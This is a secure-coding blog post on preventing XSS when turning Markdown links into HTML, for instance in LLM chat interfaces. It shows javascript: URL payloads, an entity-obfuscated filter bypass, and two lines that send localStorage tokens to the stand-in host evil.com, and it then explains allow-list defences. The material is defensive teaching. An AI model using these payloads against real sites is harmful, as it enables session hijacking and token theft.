
How to Parse URLs from Markdown to HTML Securely?

What if I told you that parsing URLs from user input, especially from Markdown content, can be a security risk? Here is how URL parsing logic can be bypassed and what you need to know to handle it in a secure way.

Initially, this might sound like a simple question: just use the built-in url module in Node.js to parse URLs, right? Or better yet, use the JavaScript URL object via new URL() and extract the parts you need from there. But it might not be as easy as it seems.

Maybe? Let’s evaluate based on a real-world scenario that I’ve seen in the wild, referring specifically to Markdown-based libraries.

Markdown to HTML

One of the most popular use-cases that requires URL parsing is handling Markdown-formatted content and rendering it on a web page, which means translating it into its HTML equivalent.

Actually, this use-case might sound more popular to you than ever before, due to the rise of LLMs (Large Language Models): these generative text models return structured content in their response payloads, and you then need to render it on the page.

To put that use-case example into practical terms, imagine you have the following React component that renders a chat-bot like interface on the page:

return (
<div className="mt-2 flex w-full flex-row items-start justify-start gap-3">
<Flex
ref={messageRef}
direction="col"
gap="lg"
items="start"
className="min-w-0 flex-grow pb-8"
>
<AISelectionProvider onSelect={handleSelection}>
<Mdx
message={rawAI ?? undefined}
animate={!!isLoading}
messageId={id}
/>
</AISelectionProvider>
{stop && (
<AIMessageError
stopReason={stopReason ?? undefined}
message={message}
/>
)}
<AIMessageActions message={message} canRegenerate={message && isLast} />
<AIRelatedQuestions message={message} show={message && isLast} />
</Flex>
</div>
);

Practically, the messages use a library like marked-react to convert the Markdown syntax from the LLM response into HTML, as follows:

return (
<article className={articleClass} id={`message-${messageId}`}>
<Markdown
renderer={{
text: (text) => text,
paragraph: (children) => (
<motion.p
variants={REVEAL_ANIMATION_VARIANTS}
animate={"visible"}
initial={animate ? "hidden" : "visible"}
>
{children}
</motion.p>
),
em: renderEm,
heading: renderHeading,
hr: renderHr,
br: renderBr,
link: (href, text) => renderLink(href, text, messageId),
image: renderImage,
code: renderCode,
codespan: renderCodespan,
}}
openLinksInNewTab={true}
>
{message}
</Markdown>
</article>
);

Parsing Dangerous URLs from Markdown

Ok, so we covered the use-case as an example of where and why you’ll often need to parse URLs from arbitrary strings, be it Markdown or otherwise.

Now imagine what the Markdown content might look like:

[Click here to visit my website](https://lirantal.com)

Or maybe:

<a href="https://lirantal.com">Click here to visit my website</a>

So what stops someone from crafting a malicious URL that makes use of the javascript: protocol scheme to execute arbitrary JavaScript code, which is exactly how we get to Cross-site Scripting (XSS) vulnerabilities?

Imagine the following XSS payload:

[Click here to visit my website](javascript:alert('XSS'))

A Markdown parser might naively translate the URL verbatim into the equivalent HTML anchor tag:

<a href="javascript:alert('XSS')">Click here to visit my website</a>

What’s in a JavaScript alert('XSS')?

Oh, right. This might not seem dangerous at first glance. What’s in an alert pop-up?

But if, for example, you use JWTs to manage authentication and store them in local storage, then this type of XSS attack allows exfiltrating the JWT and hijacking the user’s session. Imagine the following:

[Click here to visit my website](javascript:fetch('https://evil.com?token=' + localStorage.getItem('token')))

I wish it were that easy, but it’s not. If you’ve been doing web development for a while, you’ve probably been bitten by this little thing called CORS, which is the devil, but let’s not get side-tracked. CORS is a browser security feature that restricts cross-origin requests (requests from one origin (domain) to another, roughly speaking), so the above example won’t work cleanly as-is. So not really the devil? More like your guardian angel 🪽.

The game isn’t over though: we can come up with JavaScript code that creates an image tag and sets its src attribute to the URL we want to exfiltrate the token to:

[Click here to visit my website](javascript:document.body.appendChild(document.createElement('img')).src='https://evil.com?token='+localStorage.getItem('token'))

Slick, eh? :-)

Anyways, I’m digressing here. But I do enjoy showing you and teaching you a bunch of web security tricks!

Parsing a URL in JavaScript

So back to the problem at hand. You get a Markdown link element with a URL of javascript:alert() and now what? Well, maybe you pass it to new URL(), or maybe you manually parse it with a regex pattern to ensure it doesn’t include dangerous protocols like javascript:, right? So you’d have a snippet of code that looks like this:

const unsafeLinkPrefix = [
'javascript:',
'data:text/html',
'vbscript:',
'data:text/javascript',
'data:text/vbscript',
'data:text/css',
'data:text/plain',
'data:text/xml'
]

And then you’ll likely have a function that denies any URL with those protocol schemes that could turn into an XSS attack. Congrats.
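Such a function might look like the following sketch (the helper name isUnsafeLink is my own, not from any particular library):

```javascript
// A sketch of a deny-list check built on the unsafeLinkPrefix array.
const unsafeLinkPrefix = [
  'javascript:',
  'data:text/html',
  'vbscript:',
  'data:text/javascript',
];

function isUnsafeLink(url) {
  // Normalize before matching so "JaVaScRiPt:" is also caught
  const normalized = url.trim().toLowerCase();
  return unsafeLinkPrefix.some((prefix) => normalized.startsWith(prefix));
}

console.log(isUnsafeLink("javascript:alert('XSS')")); // true
console.log(isUnsafeLink('https://lirantal.com'));    // false
```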

Insecure URL Parsing

But what if I told you that denying protocol schemes like that is not enough? 😲

Imagine user input, or a tricked LLM-generated response, that includes the following URL:

<a href="jav&#x09;ascript:alert('XSS');">Click Me</a>

This might look odd to you but the browser certainly knows how to interpret it. Your regex pattern matching logic will not catch this attack because it doesn’t strictly match the string “javascript”, right?

What does it do though? Let’s break it down. First of all, the text &#x09; is an HTML entity; specifically, it refers to the horizontal tab character. Each of these characters has a meaning:

  • & starts the entity reference.
  • # indicates a numeric character reference.
  • x09 is the hexadecimal Unicode code point for the tab character (equivalent to decimal 9).
  • ; ends the entity reference.

Similarly, there are other payloads that utilize HTML entities to bypass bad regex patterns or just generally insecure pattern matching logic that would allow the URL to be kept as-is, and when it hits the DOM, the browser will easily interpret it as a JavaScript URL.
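To make the bypass concrete, here is a sketch showing why a naive prefix check misses the entity-obfuscated payload:

```javascript
// The obfuscated payload from the example above
const payload = "jav&#x09;ascript:alert('XSS');";

// A naive prefix check does not match, so the URL slips through:
console.log(payload.toLowerCase().startsWith('javascript:')); // false

// But once the browser decodes the HTML entity (&#x09; is a tab),
// the href effectively becomes "jav\tascript:alert('XSS');",
// which browsers are happy to treat as a javascript: URL.
```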

How to Securely Parse URLs from Markdown

At this point, the dangers of parsing URLs should be clear. So, to get on with the positive side of things, let’s talk about patterns and security best practices for properly and securely parsing URLs.

The following practices are listed in the order in which you should apply them to secure your URL parsing logic:

1. Allow-list vs Deny-list

Development paradigms such as maintaining the unsafeLinkPrefix array are a form of deny-list, and that’s often a bad pattern. The reason is that attackers will always come up with novel tricks to bypass your deny-list, while you, on the other hand, have to keep up with it and maintain it. It’s a losing battle.

So, instead of having a deny-list that includes javascript: and any other protocols you deem dangerous, change perspectives. Work from an allow-list: what does a URL need to look like to be valid for your use-cases?

For example, allow only the https: protocol.
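A minimal allow-list check could be sketched like this, using new URL() to extract the protocol (the function name isAllowedUrl is my own; adjust the allowed protocols to your use-case):

```javascript
// Allow-list approach: only protocols explicitly listed here pass.
const ALLOWED_PROTOCOLS = ['https:'];

function isAllowedUrl(url) {
  try {
    const parsed = new URL(url);
    return ALLOWED_PROTOCOLS.includes(parsed.protocol);
  } catch {
    return false; // not a valid absolute URL at all
  }
}

console.log(isAllowedUrl('https://lirantal.com'));    // true
console.log(isAllowedUrl("javascript:alert('XSS')")); // false
```

Note that new URL() happily parses javascript: URLs; it’s the protocol check that rejects them.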

2. Use secure anchor tags

When you render the URL as an anchor tag, you can utilize web standards that help enforce hardened security. For example, by default, render all these anchor HTML elements with the rel="noopener noreferrer" and target="_blank" attributes.

By doing that, the browser will open the URL in a new tab and will not allow the new page to access the window.opener property, which is a common vector for reverse-tabnabbing phishing attacks.
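In code, a hardened anchor renderer might look like this sketch (the helper name renderSafeAnchor is my own, and it assumes the href has already passed your allow-list validation and that the text is escaped elsewhere):

```javascript
// Sketch: render an anchor with hardened defaults applied.
// Assumes `href` was already validated against your allow-list.
function renderSafeAnchor(href, text) {
  return `<a href="${href}" target="_blank" rel="noopener noreferrer">${text}</a>`;
}

console.log(renderSafeAnchor('https://lirantal.com', 'My site'));
// <a href="https://lirantal.com" target="_blank" rel="noopener noreferrer">My site</a>
```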

3. Secure by default

This practice I specifically want to devote to library authors.

If you’re maintaining a library or some form of 3rd-party dependency that handles the parsing logic, you might say it’s not your responsibility to decide whether URLs open in the same browsing tab or a new one, or whether you should also support the ftp:// protocol scheme.

I get you.

But there’s a lot of value in providing a safe, hardened, secure-by-default approach that guarantees safe security defaults for the vast majority of users, and then building on top of it a way for consumers to opt out of those defaults for more flexibility. At that point, they’ll hopefully consider the security implications of deviating from the default and make an informed decision (hopefully 😅).

4. Decode URLs

URLs can be encoded in various ways. For example, the URL https://lirantal.com can be percent-encoded as https%3A%2F%2Flirantal.com. That encoded form isn’t valid as a standalone URL, but since I have no idea how you intend to parse URLs, you may well have a use-case in which URLs arrive via a query string, say https://example.com?redirect=https%3A%2F%2Flirantal.com, and that’s where encoding and decoding URLs comes in handy.

So, all that to say: your first step in parsing URLs is to decode them, so that you get a normalized URL representation you can work with.

In technical terms it means:

const decodedUrl = decodeURIComponent(url);
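One thing to watch for: attackers sometimes double-encode payloads, so a single decodeURIComponent call may not be enough. A hedged approach (my own sketch, not a standard API) is to decode repeatedly until the string stops changing, with a cap to avoid pathological input:

```javascript
// Repeatedly percent-decode a URL until it reaches a fixed point,
// so double- (or triple-) encoded payloads are fully normalized.
function fullyDecode(url, maxIterations = 5) {
  let current = url;
  for (let i = 0; i < maxIterations; i++) {
    let decoded;
    try {
      decoded = decodeURIComponent(current);
    } catch {
      break; // malformed percent-encoding; keep what we have
    }
    if (decoded === current) break; // fixed point reached
    current = decoded;
  }
  return current;
}

console.log(fullyDecode('https%253A%252F%252Flirantal.com'));
// → https://lirantal.com
```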

5. Sanitize HTML entities and control characters

As we’ve seen in the example of the jav&#x09;ascript:alert('XSS'); URL, you should also take into account that URLs can be crafted with some payloads that you wouldn’t expect such as HTML entities.

Payloads might also employ control characters (such as tabs and newlines) that can be used to bypass your URL parsing logic.

The only way to handle these characters is to match them via string pattern matching (such as a regex) and remove them from the URL before evaluating it.

Following is my recommendation for a practical and secure regular expression to match and remove HTML entities from a URL:

url = url.replace(/&#x([0-9a-f]+);?/gi, '')
.replace(/&#(\d+);?/g, '')
.replace(/&[a-z]+;?/gi, '')

Another variation of the above that you may consider is the following all-in-one regex:

url = url.replace(/&(#(?:\d+)|(?:#x[0-9A-Fa-f]+)|(?:\w+));?/g, '')
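Applying that all-in-one regex to the earlier payload shows it reconstructing the dangerous protocol, which your deny- or allow-list logic can then catch:

```javascript
// Strip HTML entity sequences (&#x09; style, &#9; style, and named
// entities like &tab;) from a URL before evaluating it.
function stripHtmlEntities(url) {
  return url.replace(/&(#(?:\d+)|(?:#x[0-9A-Fa-f]+)|(?:\w+));?/g, '');
}

console.log(stripHtmlEntities("jav&#x09;ascript:alert('XSS');"));
// → javascript:alert('XSS');
```

Be aware that this is deliberately aggressive: it also strips legitimate entity-like sequences (for example an &amp; in a query string), which is usually an acceptable trade-off for untrusted input.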

6. Use the URL parser

Finally, pass the URL to the new URL() function and handle error exceptions.

For example, even if you skip the previous step of sanitizing HTML entities and pass the URL as-is to the new URL() function, it will throw an error because the usage of HTML entities in a protocol scheme is invalid:

let exampleBad = 'jav&#10;ascript:alert(4)'
console.log(new URL(exampleBad))

node:internal/url:806
const href = bindingUrl.parse(input, base, raiseException);
^
TypeError: Invalid URL
at new URL (node:internal/url:806:29)

Still, you’d probably want to keep the URL sanitization logic in place and also pass the result to the new URL() constructor, to ensure it’s a valid URL and no errors are thrown.

If you do choose to use the URL() constructor web API, then you’ll probably want to approach this ordered list of practices differently: once you’ve decoded the URL, sanitized it, and run it through new URL(), you can apply the allow-list logic by checking the protocol scheme via the returned object’s url.protocol property.
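Pulling the steps together, the whole pipeline can be sketched as a single function (the name parseSafeUrl and its structure are my own, not from a specific library):

```javascript
// Sketch: decode, strip entities and control characters, parse with
// new URL(), then allow-list the protocol. Returns a URL object on
// success, or null for anything invalid or disallowed.
function parseSafeUrl(rawUrl, allowedProtocols = ['https:']) {
  // 1. Decode percent-encoding
  let url;
  try {
    url = decodeURIComponent(rawUrl);
  } catch {
    return null; // malformed percent-encoding
  }

  // 2. Strip HTML entities and control characters
  url = url
    .replace(/&(#(?:\d+)|(?:#x[0-9A-Fa-f]+)|(?:\w+));?/g, '')
    .replace(/[\u0000-\u001F\u007F]/g, '');

  // 3. Parse with the URL constructor
  let parsed;
  try {
    parsed = new URL(url);
  } catch {
    return null; // not a valid absolute URL
  }

  // 4. Allow-list the protocol
  return allowedProtocols.includes(parsed.protocol) ? parsed : null;
}

console.log(parseSafeUrl('https://lirantal.com')?.href);    // https://lirantal.com/
console.log(parseSafeUrl("jav&#x09;ascript:alert('XSS')")); // null
```

Note how the entity-obfuscated payload is first normalized back into a javascript: URL and then rejected by the allow-list, rather than relying on a fragile deny-list match.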

